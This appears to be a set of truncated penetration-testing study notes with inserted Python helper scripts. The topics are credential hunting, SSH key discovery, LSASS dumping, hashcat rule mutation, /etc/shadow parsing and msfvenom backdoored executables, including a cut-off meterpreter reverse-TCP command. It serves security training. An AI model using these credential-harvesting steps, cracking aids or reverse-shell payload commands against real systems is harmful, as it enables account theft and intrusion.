1. Protected Files
1) Hunting for Encoded Files
(1) Hunting for SSH Keys
cry0l1t3@unixclient:~$ grep -rnw "PRIVATE KEY" /* 2>/dev/null | grep ":1"
/home/cry0l1t3/.ssh/internal_db:1:-----BEGIN OPENSSH PRIVATE KEY-----
/home/cry0l1t3/.ssh/SSH.private:1:-----BEGIN OPENSSH PRIVATE KEY-----
/home/cry0l1t3/Mgmt/ceil.key:1:-----BEGIN OPENSSH PRIVATE KEY-----
- Most SSH keys we will find nowadays are encrypt..
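The grep one-liner above only tells us that a file starts with a private-key header; the next thing a practitioner wants to know is whether each key is usable as-is or needs a passphrase. The script below is an added example, not code from the original post: it walks a directory tree the way the grep does (first line contains "PRIVATE KEY") and then classifies each hit by reading the OpenSSH v1 header (cipher and KDF names) or the legacy PEM `Proc-Type: 4,ENCRYPTED` header. The three key files it creates are constructed for the demo and contain no real key material; their names mirror the grep output above.

```python
"""Hunt for private-key files and report whether each one is encrypted.

Added example, not from the original post. Sample keys are constructed and
hold no real key material: the OpenSSH ones carry only the format header.
"""
import base64
import os
import struct
import tempfile

OPENSSH_MAGIC = b"openssh-key-v1\x00"


def _read_string(buf: bytes, off: int):
    """Read one SSH wire-format string (uint32 big-endian length + bytes)."""
    (n,) = struct.unpack(">I", buf[off:off + 4])
    return buf[off + 4:off + 4 + n], off + 4 + n


def key_status(text: str) -> str:
    """Classify key text as openssh-plain, openssh-encrypted, pem-plain,
    pem-encrypted or unknown."""
    lines = [ln.strip() for ln in text.strip().splitlines()]
    if not lines or "PRIVATE KEY" not in lines[0]:
        return "unknown"
    if "BEGIN OPENSSH PRIVATE KEY" in lines[0]:
        body = "".join(ln for ln in lines[1:] if not ln.startswith("-----"))
        raw = base64.b64decode(body)
        if not raw.startswith(OPENSSH_MAGIC):
            return "unknown"
        # Header layout: magic, string ciphername, string kdfname, ...
        cipher, off = _read_string(raw, len(OPENSSH_MAGIC))
        kdf, _ = _read_string(raw, off)
        if cipher == b"none" and kdf == b"none":
            return "openssh-plain"
        return "openssh-encrypted"
    # Legacy PEM (RSA/EC/DSA): encryption is announced in the PEM headers.
    if any(h.startswith("Proc-Type: 4,ENCRYPTED") for h in lines[1:4]):
        return "pem-encrypted"
    return "pem-plain"


def hunt_private_keys(root: str) -> dict:
    """Walk root; return {path: status} for files whose first line names a private key."""
    found = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", errors="ignore") as fh:
                    first = fh.readline()
                    if "PRIVATE KEY" not in first:
                        continue
                    found[path] = key_status(first + fh.read())
            except OSError:
                continue
    return found


def _fake_openssh_key(cipher: bytes, kdf: bytes) -> str:
    """Constructed OpenSSH v1 header only (no keys inside), base64/PEM-wrapped."""
    raw = OPENSSH_MAGIC
    for s in (cipher, kdf, b""):          # ciphername, kdfname, kdfoptions
        raw += struct.pack(">I", len(s)) + s
    raw += struct.pack(">I", 0)           # number of keys: 0 for the demo
    b64 = base64.b64encode(raw).decode()
    return f"-----BEGIN OPENSSH PRIVATE KEY-----\n{b64}\n-----END OPENSSH PRIVATE KEY-----\n"


# Constructed sample tree; names echo the grep hits above.
SAMPLES = {
    ".ssh/internal_db": _fake_openssh_key(b"none", b"none"),
    ".ssh/SSH.private": _fake_openssh_key(b"aes256-ctr", b"bcrypt"),
    "Mgmt/ceil.key": ("-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\n"
                      "DEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF\n\nQUJD\n"
                      "-----END RSA PRIVATE KEY-----\n"),
    "notes.txt": "no key here\n",
}


def demo() -> dict:
    """Write SAMPLES into a temp dir, hunt it, return {relative path: status}."""
    with tempfile.TemporaryDirectory() as root:
        for rel, content in SAMPLES.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w") as fh:
                fh.write(content)
        found = hunt_private_keys(root)
        return {os.path.relpath(p, root).replace(os.sep, "/"): s for p, s in found.items()}


if __name__ == "__main__":
    for path, status in sorted(demo().items()):
        print(f"{path}: {status}")
```

An `openssh-plain` hit can be used immediately with `ssh -i`; an encrypted one needs its passphrase recovered first (for example with ssh2john and john), which is why the status is worth recording alongside the path.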
Study Record/Cybersecurity

1. PtT (Pass the Ticket) from Windows
- In this attack, we use a stolen Kerberos ticket to move laterally instead of an NTLM password hash.
1) Kerberos Protocol Refresher
- The Kerberos authentication system is ticket-based.
- Kerberos keeps all tickets on your local system and presents each service only the specific ticket for that service, preventing a ticket from being used for another purpose. ..

1. Credential Hunting in Windows
- It is the process of performing detailed searches across the file system and through various applications to discover credentials.
1) Search Centric
(1) Key Terms to Search
a. Passwords
b. Passphrases
c. Keys
d. Username
e. User account
f. Creds
g. Users
h. Passkeys
i. Passphrases
j. configuration
k. dbcredential
l. dbpassword
m. pwd
n. Login
o. Credentials
(2) Running Lazagne ..
1. Attacking LSASS
1) LSASS
- Stores credentials of the sessions that are currently logged on to the Windows system
- Caches credentials locally in memory
- Creates access tokens
- Enforces security policies
- Writes to the Windows security log
2) Dumping LSASS Process Memory
(1) Task Manager Method
- With access to an interactive graphical session on the target, we can use Task Manager to create a memory dump.
a. Open Tas..
1. Password Reuse / Default Passwords
1) Credential Stuffing
- Attacking services with default credentials or credentials obtained elsewhere
- This is a simplified variant of brute-forcing: only known username/password pairs are tried, not every combination of usernames and passwords.
https://github.com/ihebski/DefaultCreds-cheat-sheet
GitHub - ihebski/DefaultCreds-cheat-sheet: One place for all the default credentials to assist the Blue/Red..
1. Password Mutations
1) Password List
yeon0815@htb[/htb]$ cat password.list
password
2) Hashcat
(1) : - Do nothing
(2) l - Lowercase all letters
(3) u - Uppercase all letters
(4) c - Capitalize the first letter and lowercase the others
(5) sXY - Replace all instances of X with Y
(6) $! - Add the exclamation character at the end
3) Hashcat Rule File
yeon0815@htb[/htb]$ cat custom.rule
:
c
so0
c so0
sa@
c sa@
c sa..
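The rule functions above are easy to misread in a rule file (for instance, whether `c so0` and `cso0` are the same rule). The script below is an added example, not part of the original post and not hashcat's own code: a small interpreter for exactly the six functions listed (`:`, `l`, `u`, `c`, `sXY`, `$X`) so the candidates a rule file will produce can be previewed before running hashcat. `WORDLIST` and `RULE_FILE` are constructed for the demo; `RULE_FILE` follows the shape of the custom.rule excerpt above.

```python
"""Interpreter for the hashcat rule functions listed above (added example).

Not hashcat's code: it supports only ':', 'l', 'u', 'c', 'sXY' and '$X'.
WORDLIST and RULE_FILE are constructed demo input.
"""

# Function letter -> number of argument characters it consumes.
ARG_COUNT = {":": 0, "l": 0, "u": 0, "c": 0, "s": 2, "$": 1}


def tokenize(rule: str):
    """Split one rule line into (function, argument) pairs.

    hashcat ignores spaces between functions, so 'c so0' and 'cso0' are the
    same rule; both spellings are accepted here.
    """
    funcs, i = [], 0
    while i < len(rule):
        ch = rule[i]
        if ch.isspace():
            i += 1
            continue
        if ch not in ARG_COUNT:
            raise ValueError(f"unsupported rule function {ch!r} in {rule!r}")
        n = ARG_COUNT[ch]
        arg = rule[i + 1:i + 1 + n]
        if len(arg) != n:
            raise ValueError(f"function {ch!r} needs {n} argument char(s) in {rule!r}")
        funcs.append((ch, arg))
        i += 1 + n
    return funcs


def apply_rule(word: str, rule: str) -> str:
    """Apply one rule line to a word, functions left to right."""
    for func, arg in tokenize(rule):
        if func == "l":
            word = word.lower()
        elif func == "u":
            word = word.upper()
        elif func == "c":
            word = word[:1].upper() + word[1:].lower()
        elif func == "s":
            word = word.replace(arg[0], arg[1])
        elif func == "$":
            word = word + arg
        # ':' is the no-op that keeps the unmodified word in the output
    return word


def parse_rules(text: str):
    """Rule file text -> list of rule lines; blank lines and '#' comments skipped."""
    return [ln.strip() for ln in text.splitlines()
            if ln.strip() and not ln.lstrip().startswith("#")]


def mutate(wordlist, rules):
    """Every rule applied to every word, word-major order, like hashcat --stdout -r."""
    return [apply_rule(w, r) for w in wordlist for r in rules]


# Constructed demo input, same idea as password.list and custom.rule above.
WORDLIST = ["password", "HelloWorld"]
RULE_FILE = """\
:
c
so0
c so0
sa@
c sa@
c sa@ so0
$!
c sa@ so0 $!
"""

if __name__ == "__main__":
    for candidate in mutate(WORDLIST, parse_rules(RULE_FILE)):
        print(candidate)
```

The output is not de-duplicated, matching what hashcat feeds to its cracking loop; a word without any `o` or `a` simply passes through the `so0` and `sa@` rules unchanged, which is why several rules can yield the same candidate.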
1. Network Services
1) WinRM (Windows Remote Management)
- It is the Microsoft implementation of the WS-Management network protocol.
- It is an XML web-services protocol based on SOAP, used for remote management of Windows systems.
- It must be activated and configured manually on Windows 10.
- TCP ports 5985 (HTTP) and 5986 (HTTPS)
(1) CrackMapExec
- A handy tool that we can use for ou..
1. Credential Storage
1) Linux
(1) /etc/shadow
- Passwords are commonly stored in the form of hashes.
- This file can only be read by the user root.
root@htb:~# cat /etc/shadow
...SNIP...
htb-student:$y$j9T$3QSBB6CbHEu...SNIP...f8Ms:18955:0:99999:7:::
- Format of the password field: ${id}${salt}${hash}
- {id} identifies the cryptographic hash method used to hash the password.
a. $1$: MD5
b. $2a$: Blowfish (bcrypt)
c. $5$: SHA-256
d. $6$: SHA-51..
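A parser for the field layout described above, as an added example that is not part of the original post. It splits a shadow line into its nine colon-separated fields, pulls `{id}`, `{salt}` and `{hash}` out of the password field, and adds the cases a pentester actually meets when reading the file: `!`-locked accounts whose hash is still present (and still crackable offline), `*` no-login accounts, and empty password fields. The id table uses the post's `$1$`, `$2a$`, `$5$` and `$6$` plus the `$2b$`/`$2y$` bcrypt variants and `$y$` yescrypt, which the post's own `htb-student` line uses. Every entry in `SAMPLE_SHADOW` is constructed; the `PLACEHOLDERHASH` strings are not real hashes.

```python
"""Parse /etc/shadow entries and name the hash method from the $id$ prefix.

Added example, not from the original post. SAMPLE_SHADOW is constructed:
users, salts and PLACEHOLDERHASH strings are made up, not real hashes.
"""

HASH_METHODS = {
    "1": "MD5 (md5crypt)",
    "2a": "Blowfish (bcrypt)",
    "2b": "Blowfish (bcrypt)",
    "2y": "Blowfish (bcrypt)",
    "5": "SHA-256 (sha256crypt)",
    "6": "SHA-512 (sha512crypt)",
    "y": "yescrypt",
}
WEAK_IDS = {"1"}  # md5crypt is fast to brute-force; flag it in the report


def parse_password_field(pw: str) -> dict:
    """Split the second shadow field into status, hash id, salt and hash.

    A leading '!' locks the account, but a hash that follows it is still
    present and can be cracked offline, so it is parsed rather than skipped.
    """
    if pw == "":
        return {"status": "empty", "hash_id": "", "salt": "", "hash": ""}
    locked = pw.startswith("!")
    body = pw.lstrip("!")
    if body == "":
        return {"status": "locked", "hash_id": "", "salt": "", "hash": ""}
    if body == "*":
        return {"status": "no-login", "hash_id": "", "salt": "", "hash": ""}
    if not body.startswith("$"):
        return {"status": "unknown", "hash_id": "", "salt": "", "hash": body}
    parts = body.split("$")[1:]          # drop the empty string before the first '$'
    hash_id = parts[0]
    try:
        if hash_id in ("2a", "2b", "2y"):
            # bcrypt: $2b$<cost>$<22-char salt><31-char hash>, no '$' between them
            salt, digest = parts[2][:22], parts[2][22:]
        elif hash_id == "y":
            # yescrypt: $y$<params>$<salt>$<hash>
            salt, digest = parts[2], parts[3]
        else:
            # $1$/$5$/$6$: an optional "rounds=N$" may precede the salt
            rest = [p for p in parts[1:] if not p.startswith("rounds=")]
            salt, digest = rest[0], rest[1]
    except IndexError:
        return {"status": "malformed", "hash_id": hash_id, "salt": "", "hash": body}
    return {"status": "locked" if locked else "hashed",
            "hash_id": hash_id, "salt": salt, "hash": digest}


def parse_shadow_line(line: str) -> dict:
    """One shadow line -> dict with user, password-field details and ageing fields."""
    fields = line.rstrip("\n").split(":")
    if len(fields) != 9:
        raise ValueError(f"expected 9 fields, got {len(fields)}: {line!r}")
    entry = {"user": fields[0], **parse_password_field(fields[1])}
    entry["method"] = HASH_METHODS.get(entry["hash_id"], "unknown" if entry["hash_id"] else "n/a")
    entry["weak"] = entry["hash_id"] in WEAK_IDS
    last, min_days, max_days, warn = (int(f) if f else None for f in fields[2:6])
    entry.update(last_change=last, min_days=min_days, max_days=max_days, warn_days=warn)
    return entry


def parse_shadow(text: str) -> list:
    return [parse_shadow_line(ln) for ln in text.splitlines() if ln.strip()]


def audit(entries: list) -> list:
    """Findings worth a line in the report: crackable hashes, weak methods, empty passwords."""
    findings = []
    for e in entries:
        if e["status"] == "empty":
            findings.append(f"{e['user']}: empty password field")
        elif e["hash_id"]:
            tag = " [WEAK]" if e["weak"] else ""
            note = " (locked, but hash still present)" if e["status"] == "locked" else ""
            findings.append(f"{e['user']}: {e['method']}{tag}{note}")
    return findings


# Constructed sample; the hash parts are placeholders of roughly the right shape.
SAMPLE_SHADOW = """\
root:$6$rounds=5000$saltsaltsalt$PLACEHOLDERHASH:18955:0:99999:7:::
htb-student:$y$j9T$3QSBB6CbHEu0123456789$PLACEHOLDERHASH:18955:0:99999:7:::
legacy:$1$abcdefgh$PLACEHOLDERHASH:15000:0:99999:7:::
svc-backup:$2b$12$abcdefghijklmnopqrstuvPLACEHOLDERHASHPLACEHOLDERHASHP:18955:0:99999:7:::
olduser:!$6$abcdefgh$PLACEHOLDERHASH:17000:0:99999:7:::
daemon:*:18000:0:99999:7:::
guest:!:18955:0:99999:7:::
nopass::18955:0:99999:7:::
"""

if __name__ == "__main__":
    for line in audit(parse_shadow(SAMPLE_SHADOW)):
        print(line)
```

Run it against a real copy of /etc/shadow (as root, or from a backup found during credential hunting) by replacing `SAMPLE_SHADOW` with the file contents; the `method` field tells you which hashcat or john mode to use, and the `[WEAK]` tag and locked-but-present notes tell you where to start.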
1. Evasion Techniques
- We are in luck because msfvenom offers the option of using executable templates.
- This allows us to use pre-set templates for executable files, inject our payload into them, and use any executable as a platform from which we can launch our attack.
- This generates what is called a backdoored executable.
yeon0815@htb[/htb]$ msfvenom windows/x86/meterpreter_reverse_tcp LH..

1. Meterpreter
- Meterpreter resides entirely in the memory of the remote host and leaves no traces on the hard drive, making it difficult to detect with conventional forensic techniques.
- With the updated msfconsole v6, all Meterpreter payload communications between the target host and us are encrypted using AES to ensure confidentiality and integrity of data communications.
1) Scanning Targ..
1. Jobs
- We would use the jobs command to look at the currently active tasks running in the background and terminate the old ones to free up the port.
msf6 exploit(multi/handler) > jobs -h
Usage: jobs [options]
Active job manipulation and interaction.
OPTIONS:
    -K   Terminate all running jobs.
    -P   Persist all running jobs on restart.
    -S   Row search filter.
    -h   Help banne..
1. Plugins
yeon0815@htb[/htb]$ ls /usr/share/metasploit-framework/plugins
aggregator.rb  beholder.rb  event_tester.rb  komand.rb  msfd.rb  nexpose.rb  request.rb  session_notifier.rb  sounds.rb  token_adduser.rb  wmap.rb
alias.rb  db_credcollect.rb  ffautoregen.rb  lab.rb  msgrpc.rb  openvas.rb  rssfeed.rb  session_tagger.rb  sqlmap.rb  token_hunter.rb
auto_add_rou..